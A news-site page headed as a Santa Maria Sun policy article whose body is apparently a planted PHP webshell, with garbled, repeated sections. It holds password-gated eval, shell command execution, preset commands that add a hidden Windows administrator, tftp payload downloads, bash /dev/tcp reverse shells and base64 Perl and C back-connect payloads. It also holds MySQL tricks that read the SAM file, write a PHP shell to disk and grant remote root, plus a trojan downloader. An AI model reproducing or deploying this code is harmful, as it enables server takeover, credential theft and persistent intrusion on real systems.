Santa Maria Sun> Policy Wednesday, Oct 21, 2020     Volume 23, Issue 78   

'); if($_GET['db']){ css_js("3"); mysql_select_db($_GET['db'], $sqlcon); html_n('
$v) $_POST[$k] = stripslashes($v); foreach($_GET as $k => $v) $_GET[$k] = stripslashes($v); } if(isset($_REQUEST[postpass])){ hmlogin(2); @eval($_REQUEST[postpass]); exit;} if($_COOKIE['postpass'] != md5(postpass)){ if($_POST['postpass']){ if($_POST['postpass'] == postpass){ setcookie('postpass',md5($_POST['postpass'])); hmlogin(); }else{ echo '
???????
'; } } islogin($shellname,$myurl); exit; } if(isset($_GET['down'])) do_down($_GET['down']); if(isset($_GET['pack'])){ $dir = do_show($_GET['pack']); $zip = new eanver($dir); $out = $zip->out; do_download($out,$_SERVER['HTTP_HOST'].".tar.gz"); } if(isset($_GET['unzip'])){ css_main(); start_unzip($_GET['unzip'],$_GET['unzip'],$_GET['todir']); exit; } define('root_dir',str_replace('\\','/',dirname(myaddress)).'/'); define('run_win',substr(PHP_OS, 0, 3) == "WIN"); define('my_shell',str_path(root_dir.$_SERVER['SCRIPT_NAME'])); $eanver = isset($_GET['eanver']) ? $_GET['eanver'] : ""; $doing = isset($_POST['doing']) ? $_POST['doing'] : ""; $path = isset($_GET['path']) ? $_GET['path'] : root_dir; $name = isset($_POST['name']) ? $_POST['name'] : ""; $img = isset($_GET['img']) ? $_GET['img'] : ""; $p = isset($_GET['p']) ? $_GET['p'] : ""; $pp = urlencode(dirname($p)); if($img) css_img($img); if($eanver == "phpinfo") die(phpinfo()); if($eanver == 'logout'){ setcookie('postpass',null); die(''); } $class = array( "????" => array("upfiles" => "????","phpinfo" => "????","info_f" => "????","phpcode" => "??PHP??"), "????" => array("sqlshell" => "??SQL??","mysql_exec" => "MYSQL??","myexp" => "MYSQL??","servu" => "Serv-U??","cmd" => "????","linux" => "????","downloader" => "????","port" => "????"), "????" => array("guama" => "??????","tihuan" => "??????","scanfile" => "??????","scanphp" => "??????"), "????" => array("getcode" => "????") ); $msg = array("0" => "????","1" => "????","2" => "????","3" => "????","4" => "????","5" => "????","6" => "????","7" => "????"); css_main(); switch($eanver){ case "left": css_left(); html_n("
"); html_img("title");html_n(" ????
    "); $ROOT_DIR = File_Mode(); html_n("
  • ?????
  • "); html_n("
  • ?????
  • "); for ($i=66;$i<=90;$i++){$drive= chr($i).':'; if (is_dir($drive."/")){$vol=File_Str("vol $drive");if(empty($vol))$vol=$drive; html_n("
  • ????($drive)
  • ");}} html_n("
"); $i = 2; foreach($class as $name => $array){ html_n("
"); html_img("title");html_n(" $name
    "); foreach($array as $url => $value){ html_n("
  • $value
  • "); } html_n("
"); $i++; } html_n("
"); html_img("title");html_n(" ????
    "); html_n("
  • ????
  • "); html_n("
"); html_n(""); break; case "main": css_js("1"); $dir = @dir($path); $REAL_DIR = File_Str(realpath($path)); if(!empty($_POST['actall'])){echo '
'.File_Act($_POST['files'],$_POST['actall'],$_POST['inver'],$REAL_DIR).'
';} $NUM_D = $NUM_F = 0; if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/'; $ROOT_DIR = File_Mode(); html_n("
??:"); html_n("
"); html_n("
"); html_n(" "); html_input("file","upfilet","","      "); html_input("submit","uploadt","??"); if(!empty($_POST['newfile'])){ if(isset($_POST['bin'])) $bin = $_POST['bin']; else $bin = "wb"; $newfile=base64_decode($_POST['newfile']); if(strtolower($_POST['charset'])=='utf-8'){$txt=base64_decode($_POST['txt']);}else{$txt=$_POST['txt'];} if (substr(PHP_VERSION,0,1)>=5){if((strtolower($_POST['charset'])=='gb2312') or (strtolower($_POST['charset'])=='gbk')){$txt=iconv("UTF-8","gb2312//IGNORE" ,base64_decode($_POST['txt']));}else{$txt = array_iconv($txt);}} echo do_write($newfile,$bin,$txt) ? '
'.$newfile.' '.$msg[0] : '
'.$newfile.' '.$msg[1]; @touch($newfile,@strtotime($_POST['time'])); } html_n('
'); html_n(''); html_n(''); while($dirs = @$dir->read()){ if($dirs == '.' or $dirs == '..') continue; $dirpath = str_path("$path/$dirs"); if(is_dir($dirpath)){ $perm = substr(base_convert(fileperms($dirpath),10,8),-4); $filetime = @date('Y-m-d H:i:s',@filemtime($dirpath)); $dirpath = urlencode($dirpath); html_n(''); $NUM_D++; } } @$dir->rewind(); while($files = @$dir->read()){ if($files == '.' or $files == '..') continue; $filepath = str_path("$path/$files"); if(!is_dir($filepath)){ $fsize = @filesize($filepath); $fsize = File_Size($fsize); $perm = substr(base_convert(fileperms($filepath),10,8),-4); $filetime = @date('Y-m-d H:i:s',@filemtime($filepath)); $Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$filepath); $todir=$ROOT_DIR.'/zipfile'; $filepath = urlencode($filepath); $it=substr($filepath,-3); html_n(''); $NUM_F++; } } @$dir->close(); if(!$Filetime) $Filetime = gmdate('Y-m-d H:i:s',time() + 3600 * 8); print<<
??({$NUM_D}) / ??({$NUM_F})
END; break; case "editr": print<< END; html_base(); print<< END; css_js("2"); if(!empty($_POST['uploadt'])){ echo @copy($_FILES['upfilet']['tmp_name'],str_path($p.'/'.$_FILES['upfilet']['name'])) ? html_a("?eanver=main",$_FILES['upfilet']['name'].' '.$msg[2]) : msg($msg[3]); die(''); } if(!empty($_GET['redir'])){ $name=$_GET['name']; $newdir = str_path($p.'/'.$name); @mkdir($newdir,0777) ? html_a("?eanver=main",$name.' '.$msg[0]) : msg($msg[1]); die(''); } if(!empty($_GET['refile'])){ $name=$_GET['name']; $jspath=urlencode($p.'/'.$name); $pp = urlencode($p); $p = str_path($p.'/'.$name); $FILE_CODE = ""; $charset= 'GB2312'; $FILE_TIME =date('Y-m-d H:i:s',time()+3600*8); if(@file_exists($p)) echo '??????"??"??
'; }else{ $jspath=urlencode($p); $FILE_TIME = date('Y-m-d H:i:s',filemtime($p)); $FILE_CODE=@file_get_contents($p); if (substr(PHP_VERSION,0,1)>=5){ if(empty($_GET['charset'])){ if(TestUtf8($FILE_CODE)>1){$charset= 'UTF-8';$FILE_CODE = iconv("UTF-8","gb2312//IGNORE",$FILE_CODE);}else{$charset= 'GB2312';} }else{ if($_GET['charset']=='GB2312'){$charset= 'GB2312';}else{$charset= $_GET['charset'];$FILE_CODE = iconv($_GET['charset'],"gb2312//IGNORE",$FILE_CODE);} } } $FILE_CODE = htmlspecialchars($FILE_CODE); } print<<????:
????: END; html_select(array("GB2312" => "GB2312","UTF-8" => "UTF-8","BIG5" => "BIG5","EUC-KR" => "EUC-KR","EUC-JP" => "EUC-JP","SHIFT-JIS" => "SHIFT-JIS","WINDOWS-874" => "WINDOWS-874","ISO-8859-1" => "ISO-8859-1"),$charset,"onchange=\"window.location='?eanver=editr&p={$jspath}&charset='+options[selectedIndex].value;\""); print<<
?????? ??????????(????)
END; break; case "rename": html_n("
"); break; case "info_f": $dis_func = get_cfg_var("disable_functions"); $upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "?????"; $adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "".$_SERVER['SERVER_ADMIN']."" : "".get_cfg_var("sendmail_from").""; if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","
",$dis_func);$dis_func = str_replace(",","
",$dis_func);} $phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No"; $info = array( array("?????",date("Y?m?d? h:i:s",time())), array("?????","".$_SERVER['SERVER_NAME'].""), array("???IP??",gethostbyname($_SERVER['SERVER_NAME'])), array("???????",PHP_OS), array("???????????",$_SERVER['HTTP_ACCEPT_LANGUAGE']), array("???????",$_SERVER['SERVER_SOFTWARE']), array("??IP",$_SERVER["REMOTE_ADDR"]), array("Web????",$_SERVER['SERVER_PORT']), array("PHP????",strtoupper(php_sapi_name())), array("PHP??",PHP_VERSION), array("???????",Info_Cfg("safemode")), array("??????",$adminmail), array("?????",myaddress), array("???? URL ???? allow_url_fopen",Info_Cfg("allow_url_fopen")), array("????curl_exec",Info_Fun("curl_exec")), array("????????? enable_dl",Info_Cfg("enable_dl")), array("?????? display_errors",Info_Cfg("display_errors")), array("???????? register_globals",Info_Cfg("register_globals")), array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")), array("??????????? memory_limit",Info_Cfg("memory_limit")), array("POST????? post_max_size",Info_Cfg("post_max_size")), array("???????? upload_max_filesize",$upsize), array("???????? max_execution_time",Info_Cfg("max_execution_time")."?"), array("?????? disable_functions",$dis_func), array("phpinfo()",$phpinfo), array("????????diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'), array("???? GD Library",Info_Fun("imageline")), array("IMAP??????",Info_Fun("imap_close")), array("MySQL???",Info_Fun("mysql_close")), array("SyBase???",Info_Fun("sybase_close")), array("Oracle???",Info_Fun("ora_close")), array("Oracle 8 ???",Info_Fun("OCILogOff")), array("PREL???? 
PCRE",Info_Fun("preg_match")), array("PDF????",Info_Fun("pdf_close")), array("Postgre SQL???",Info_Fun("pg_close")), array("SNMP??????",Info_Fun("snmpget")), array("??????(Zlib)",Info_Fun("gzclose")), array("XML??",Info_Fun("xml_set_object")), array("FTP",Info_Fun("ftp_login")), array("ODBC?????",Info_Fun("odbc_close")), array("Session??",Info_Fun("session_start")), array("Socket??",Info_Fun("fsockopen")), ); $shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host"); echo '
'); html_a('?eanver=main&path='.uppath($path),'????'); html_n('??????('.get_current_user().')??|?????????
'); html_img("dir"); html_a('?eanver=main&path='.$dirpath,$dirs); html_n(''); html_n("??"); html_n("?? "); html_a('?pack='.$dirpath,'??'); html_n(''); html_a('?eanver=perm&p='.$dirpath.'&chmod='.$perm,$perm); html_n(''.GetFileOwner("$path/$dirs").':'.GetFileGroup("$path/$dirs")); html_n(''.$filetime.''); html_n('
'); html_img(css_showimg($files)); html_a($Fileurls,$files,'target="_blank"'); html_n(''); if(($it=='.gz') or ($it=='zip') or ($it=='tar') or ($it=='.7z')) html_a('?unzip='.$filepath,'??','title="??'.$files.'" onClick="rusurechk(\''.$todir.'\',\'?unzip='.$filepath.'&todir=\');return false;"'); else html_a('?eanver=editr&p='.$filepath,'??','title="??'.$files.'"'); html_n("??"); html_n("?? "); html_n("??"); html_a('?down='.$filepath,'??','??','title="??'.$files.'"'); html_n(''); html_a('?eanver=perm&p='.$filepath.'&chmod='.$perm,$perm); html_n(''.GetFileOwner("$path/$files").':'.GetFileGroup("$path/$files")); html_n(''.$filetime.''); html_a('?down='.$filepath,$fsize,'title="??'.$files.'"'); html_n('
"); $newname = urldecode($pp).'/'.urlencode($_GET['newname']); @rename($p,$newname) ? html_a("?eanver=main&path=$pp",urlencode($_GET['newname']).' '.$msg[4]) : msg($msg[5]); die(''); break; case "deltree": html_n("
"); do_deltree($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]); die(''); break; case "del": html_n("
"); @unlink($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]); die(''); break; case "copy": html_n("
"); $newpath = explode('/',$_GET['newcopy']); $pathr[0] = $newpath[0]; for($i=1;$i < count($newpath);$i++){ $pathr[] = urlencode($newpath[$i]); } $newcopy = implode('/',$pathr); @copy($p,$newcopy) ? html_a("?eanver=main&path=$pp",$newcopy.' '.$msg[4]) : msg($msg[5]); die(''); break; case "perm": html_n("
".$p.' ???: '); if(is_dir($p)){ html_select(array("0777" => "0777","0755" => "0755","0555" => "0555"),$_GET['chmod']); }else{ html_select(array("0666" => "0666","0644" => "0644","0444" => "0444"),$_GET['chmod']); } html_input("submit","save","??"); back(); if($_POST['class']){ switch($_POST['class']){ case "0777": $change = @chmod($p,0777); break; case "0755": $change = @chmod($p,0755); break; case "0555": $change = @chmod($p,0555); break; case "0666": $change = @chmod($p,0666); break; case "0644": $change = @chmod($p,0644); break; case "0444": $change = @chmod($p,0444); break; } $change ? html_a("?eanver=main&path=$pp",$msg[4]) : msg($msg[5]); die(''); } html_n("
'; for($i = 0;$i < count($info);$i++){echo ''."\n";} try{$registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\PortNumber"); $Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort"); $PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort"); }catch(Exception $e){} echo ''."\n"; echo ''."\n"; echo ''."\n"; echo '
'.$info[$i][0].''.$info[$i][1].'
Terminal Service???'.$registry_proxystring.'
Telnet???'.$Telnet.'
PcAnywhere???'.$PcAnywhere.'
'; break; case "cmd": $res = '????'; $cmd = 'whoami'; if(!empty($_POST['cmd'])){$res = Exec_Run(base64_decode($_POST['cmd']));$cmd = htmlspecialchars(base64_decode($_POST['cmd']));} print<< function sFull(i){ Str = new Array(11); Str[0] = "dir"; Str[1] = "net user mysql$ envl /add"; Str[2] = "net localgroup administrators mysql$ /add"; Str[3] = "netstat -ano"; Str[4] = "ipconfig"; Str[5] = "tasklist /svc"; Str[6] = "tftp -i {$_SERVER["REMOTE_ADDR"]} get server.exe c:\\server.exe"; Str[7] = "0<&123;exec 123<>/dev/tcp/{$_SERVER["REMOTE_ADDR"]}/12666; sh <&123 >&123 2>&123"; Str[8] = "bash -i >& /dev/tcp/{$_SERVER["REMOTE_ADDR"]}/2366 0>&1"; Str[9] = "netstat -tlnp"; document.getElementById('cmd').value = Str[i]; return true; } END; html_base(); print<<
????????????,????BASE64????,????(???,???)
????
END; break; case "linux": $yourip = $_COOKIE['yourip'] ? $_COOKIE['yourip'] : getenv('REMOTE_ADDR'); $yourport = $_COOKIE['yourport'] ? $_COOKIE['yourport'] : '12388'; $system=strtoupper(substr(PHP_OS, 0, 3)); print<<????:
????????"nc -vv -l 12388"
??????????IP,???!????????!??NC??!
????
????
????
END; if((!empty($_POST['yourip'])) && (!empty($_POST['yourport']))) { setcookie('yourip',$backip); setcookie('yourport',$backport); echo '
'; if($_POST['use'] == 'perl') { $back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; echo File_Write('/tmp/envl_bc',base64_decode($back_connect_pl),'wb') ? '??/tmp/envl_bc??
' : '??/tmp/envl_bc??
'; $perlpath = Exec_Run('which perl'); $perlpath = $perlpath ? chop($perlpath) : 'perl'; @unlink('/tmp/envl_bc.c'); echo Exec_Run($perlpath.' /tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : '??????'; } if($_POST['use'] == 'c') { $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC". "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb". "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd". "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ". "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC". "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D". "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp". "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; echo File_Write('/tmp/envl_bc.c',base64_decode($back_connect_c),'wb') ? '??/tmp/envl_bc.c??
' : '??/tmp/envl_bc.c??
'; $res = Exec_Run('gcc -o /tmp/envl_bc /tmp/envl_bc.c'); @unlink('/tmp/envl_bc.c'); echo Exec_Run('/tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : '??????'; } if($_POST['use'] == 'php') { if(!extension_loaded('sockets')) { if ($system == 'WIN') { @dl('php_sockets.dll') or die("Can't load socket"); }else{ @dl('sockets.so') or die("Can't load socket"); } } if($system=="WIN") { $env=array('path' => 'c:\\windows\\system32'); }else{ $env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin'); } $descriptorspec = array( 0 => array("pipe","r"), 1 => array("pipe","w"), 2 => array("pipe","w"), ); $host = $_POST['yourip']; $port = $_POST['yourport']; $host=gethostbyname($host); $proto=getprotobyname("tcp"); if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){ die("Socket????"); } if(($ret=socket_connect($sock,$host,$port))<0){ die("????"); }else{ $message="----------------------PHP????--------------------\n"; socket_write($sock,$message,strlen($message)); $cwd=str_replace('\\','/',dirname(__FILE__)); while($cmd=socket_read($sock,65535,$proto)){ if(trim(strtolower($cmd))=="exit"){ socket_write($sock,"Bye\n"); exit; }else{ $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env); if (is_resource($process)) { fwrite($pipes[0], $cmd); fclose($pipes[0]); $msg=stream_get_contents($pipes[1]); socket_write($sock,$msg,strlen($msg)); fclose($pipes[1]); $msg=stream_get_contents($pipes[2]); socket_write($sock,$msg,strlen($msg)); $return_value = proc_close($process); } } } } } if($_POST['use'] == 'nc') { echo '
'; $mip=$_POST['yourip']; $bport=$_POST['yourport']; $fp=fsockopen($mip , $bport , $errno, $errstr); if (!$fp){ $result = "Error: could not open socket connection"; }else { fputs ($fp ,"\n*********************************************\n hacking url:http://www.google.com is ok! \n*********************************************\n\n"); while(!feof($fp)){ fputs ($fp," [r00t@yzddmr6:/root]# "); $result= fgets ($fp, 4096); $message=`$result`; fputs ($fp,"--> ".$message."\n"); } fclose ($fp); } echo '
'; } echo '
????????? (nc -vv -l '.$_POST['yourport'].') '; } break; case "sqlshell": $MSG_BOX = ''; $mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();'; if(isset($_POST['mhost']) && isset($_POST['muser'])) { $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata); else $MSG_BOX = '??MYSQL??'; } $downfile = 'c:/windows/repair/sam'; if(!empty($_POST['downfile'])) { $downfile = File_Str($_POST['downfile']); $binpath = bin2hex($downfile); $query = 'select load_file(0x'.$binpath.')'; if($result = @mysql_query($query,$conn)) { $k = 0; $downcode = ''; while($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;} $filedown = basename($downfile); if(!$filedown) $filedown = 'envl.tmp'; $array = explode('.', $filedown); $arrayend = array_pop($array); header('Content-type: application/x-'.$arrayend); header('Content-Disposition: attachment; filename='.$filedown); header('Content-Length: '.strlen($downcode)); echo $downcode; exit; } else $MSG_BOX = '??????'; } $o = isset($_GET['o']) ? $_GET['o'] : ''; print<< function nFull(i){ Str = new Array(11); Str[0] = "select version();"; Str[1] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C) FROM user into outfile 'D:/web/iis.txt'"; Str[2] = "select '' into outfile 'F:/web/bak.php';"; Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;"; nform.msql.value = Str[i]; return true; } END; html_base(); print<<
?? ?? ?? ?? ??
END; if($o == 'u') { $uppath = 'C:/Documents and Settings/All Users/??????/??/??/exp.vbs'; if(!empty($_POST['uppath'])) { $uppath = $_POST['uppath']; $query = 'Create TABLE a (cmd text NOT NULL);'; if(@mysql_query($query,$conn)) { if($tmpcode = File_Read($_FILES['upfile']['tmp_name'])){$filecode = bin2hex(File_Read($tmpcode));} else{$tmp = File_Str(dirname(myaddress)).'/upfile.tmp';if(File_Up($_FILES['upfile']['tmp_name'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}} $query = 'Insert INTO a (cmd) VALUES(CONVERT(0x'.$filecode.',CHAR));'; if(@mysql_query($query,$conn)) { $query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';'; $MSG_BOX = @mysql_query($query,$conn) ? '??????' : '??????'; } else $MSG_BOX = '???????'; @mysql_query('Drop TABLE IF EXISTS a;',$conn); } else $MSG_BOX = '???????'; } print<<
????

????
END; } elseif($o == 'd') { print<<

????
END; } else { if(!empty($_POST['msql'])) { $msql = $_POST['msql']; $msql = base64_decode($msql); if($result = @mysql_query($msql,$conn)) { $MSG_BOX = '??SQL????
'; $k = 0; while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;} } else $MSG_BOX .= mysql_error(); } print<<{$msql}
END; } if($MSG_BOX != '') echo '
'.$MSG_BOX.'
'; else echo '
'; break; case "downloader": $Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe'; $Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe'); print<<
???
???
END; if((!empty($_POST['durl'])) && (!empty($_POST['dpath']))) { echo '
'; $contents = @file_get_contents($_POST['durl']); if(!$contents) echo '??????????'; else echo File_Write($_POST['dpath'],$contents,'wb') ? '??????' : '??????'; echo '
'; } break; case "issql": session_start(); if($_POST['sqluser'] && $_POST['sqlpass']){ $_SESSION['sql_user'] = $_POST['sqluser']; $_SESSION['sql_password'] = $_POST['sqlpass']; } if($_POST['sqlhost']){$_SESSION['sql_host'] = $_POST['sqlhost'];} else{$_SESSION['sql_host'] = 'localhost';} if($_POST['sqlport']){$_SESSION['sql_port'] = $_POST['sqlport'];} else{$_SESSION['sql_port'] = '3306';} if($_SESSION['sql_user'] && $_SESSION['sql_password']){ if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){ unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']); die(html_a('?eanver=sqlshell','???????')); } } else{ die(html_a('?eanver=sqlshell','???????')); } $query = mysql_query("SHOW DATABASES",$sqlcon); html_n('
?????:'); while($db = mysql_fetch_array($query)) { html_a('?eanver=issql&db='.$db['Database'],$db['Database']); echo '  '; } html_n('

'); html_select(array(0=>"--SQL??--",7=>"????",8=>"????",9=>"????",10=>"????",11=>"????",12=>"????",13=>"????"),0,"onchange='return Full(options[selectedIndex].value)'"); html_input("submit","doquery","??"); html_a("?eanver=issql&db=".$_GET['db'],$_GET['db']); html_n('--->'); html_a("?eanver=issql&db=".$_GET['db']."&table=".$_GET['table'],$_GET['table']); html_n('

'); if(!empty($_POST['sql'])){ if (@mysql_query($_POST['sql'],$sqlcon)) { echo "??SQL????"; }else{ echo "??: ".mysql_error(); } } if($_GET['table']){ html_n(''); $query = "SHOW COLUMNS FROM ".$_GET['table']; $result = mysql_query($query,$sqlcon); $fields = array(); while($row = mysql_fetch_assoc($result)){ array_push($fields,$row['Field']); html_n(''); } html_n(''); $result = mysql_query("SELECT * FROM ".$_GET['table'],$sqlcon) or die(mysql_error()); while($text = @mysql_fetch_assoc($result)){ foreach($fields as $row){ if($text[$row] == "") $text[$row] = 'NULL'; html_n(''); } echo ''; } } else{ $query = "SHOW TABLES FROM " . $_GET['db']; $dat = mysql_query($query, $sqlcon) or die(mysql_error()); while ($row = mysql_fetch_row($dat)){ html_n(""); } } } break; case "downloader": $Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe'; $Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe'); print<<
???
???
END; if((!empty($_POST['durl'])) && (!empty($_POST['dpath']))) { echo '
'; $contents = @file_get_contents($_POST['durl']); if(!$contents) echo '??????????'; else echo File_Write($_POST['dpath'],$contents,'wb') ? '??????' : '??????'; echo '
'; } break; case "issql": session_start(); if($_POST['sqluser'] && $_POST['sqlpass']){ $_SESSION['sql_user'] = $_POST['sqluser']; $_SESSION['sql_password'] = $_POST['sqlpass']; } if($_POST['sqlhost']){$_SESSION['sql_host'] = $_POST['sqlhost'];} else{$_SESSION['sql_host'] = 'localhost';} if($_POST['sqlport']){$_SESSION['sql_port'] = $_POST['sqlport'];} else{$_SESSION['sql_port'] = '3306';} if($_SESSION['sql_user'] && $_SESSION['sql_password']){ if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){ unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']); die(html_a('?eanver=sqlshell','???????')); } } else{ die(html_a('?eanver=sqlshell','???????')); } $query = mysql_query("SHOW DATABASES",$sqlcon); html_n('
'); if($_GET['db']){ css_js("3"); mysql_select_db($_GET['db'], $sqlcon); html_n('
'.$row['Field'].'
'.$text[$row].'
".$row[0]."
?????:'); while($db = mysql_fetch_array($query)) { html_a('?eanver=issql&db='.$db['Database'],$db['Database']); echo '  '; } html_n('

'); html_select(array(0=>"--SQL??--",7=>"????",8=>"????",9=>"????",10=>"????",11=>"????",12=>"????",13=>"????"),0,"onchange='return Full(options[selectedIndex].value)'"); html_input("submit","doquery","??"); html_a("?eanver=issql&db=".$_GET['db'],$_GET['db']); html_n('--->'); html_a("?eanver=issql&db=".$_GET['db']."&table=".$_GET['table'],$_GET['table']); html_n('

'); if(!empty($_POST['sql'])){ if (@mysql_query($_POST['sql'],$sqlcon)) { echo "??SQL????"; }else{ echo "??: ".mysql_error(); } } if($_GET['table']){ html_n(''); $query = "SHOW COLUMNS FROM ".$_GET['table']; $result = mysql_query($query,$sqlcon); $fields = array(); while($row = mysql_fetch_assoc($result)){ array_push($fields,$row['Field']); html_n(''); } html_n(''); $result = mysql_query("SELECT * FROM ".$_GET['table'],$sqlcon) or die(mysql_error()); while($text = @mysql_fetch_assoc($result)){ foreach($fields as $row){ if($text[$row] == "") $text[$row] = 'NULL'; html_n(''); } echo ''; } } else{ $query = "SHOW TABLES FROM " . $_GET['db']; $dat = mysql_query($query, $sqlcon) or die(mysql_error()); while ($row = mysql_fetch_row($dat)){ html_n(""); } } } break; case "upfiles": html_n(''); if(!empty($_POST['path'])){ html_n(''); if(!empty($_POST['path'])){ html_n(''); if(!empty($_POST['path'])){ html_n(''); if(!empty($_POST['path'])){ html_n('
'.$row['Field'].'
'.$text[$row].'
".$row[0]."
?????????????: '.@get_cfg_var('upload_max_filesize').'
'); html_input("text","uppath",root_dir,"
?????: ","51"); print<< function addTank(){ var k=0; k=k+1; k=tank.rows.length; newRow=document.all.tank.insertRow(-1) newcell=newRow.insertCell() newcell.innerHTML=" " } function delTank() { if(tank.rows.length==1) return; var checkit = false; for (var i=0;i

?????????:
END; html_n('
'); if($_POST['upfiles']){ foreach ($_FILES["upfile"]["error"] as $key => $error){ if ($error == UPLOAD_ERR_OK){ $tmp_name = $_FILES["upfile"]["tmp_name"][$key]; $name = $_FILES["upfile"]["name"][$key]; $uploadfile = str_path($_POST['uppath'].'/'.$name); $upload = @copy($tmp_name,$uploadfile) ? $name.$msg[2] : @move_uploaded_file($tmp_name,$uploadfile) ? $name.$msg[2] : $name.$msg[3]; echo '

